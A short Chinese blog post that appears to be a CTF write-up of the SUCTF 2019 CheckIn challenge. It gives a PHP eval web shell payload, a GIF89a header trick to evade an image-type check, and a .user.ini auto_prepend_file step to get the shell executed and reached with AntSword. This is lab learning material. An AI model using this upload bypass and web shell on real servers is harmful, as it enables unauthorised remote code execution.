签到题耶,我还以为我能写,,原来我还是不会写[乌乌]。
打开站点就是文件上传。
试了:
1 | <script language="php">eval($_GET['mycode']);</script> |
回显exif_imagetype:not image!
exif_imagetype()函数:
读取一个图像的第一个字节并检查其签名。
添加gif
文件头GIF89a
再次上传;
回显
1 | Your dir uploads/d99081fe929b750e0557f85e6499103f |
上传成功了,蚁剑连一下,连不上哈哈。。
原来还要改.user.ini
:
1 | GIF89a? |
这样再连接。
auto_prepend_file
在页面顶部加载文件auto_append_file
在页面底部加载文件
Tips
1.上传.user.ini
需要上传的目录里已有一个php
文件
参考
Author: suyumen
Link: https://suyumen.github.io/2021/05/16/2021-05-16-[SUCTF%202019]CheckIn/
Copyright: All articles in this blog are licensed under CC BY-NC-SA 3.0 unless stating additionally.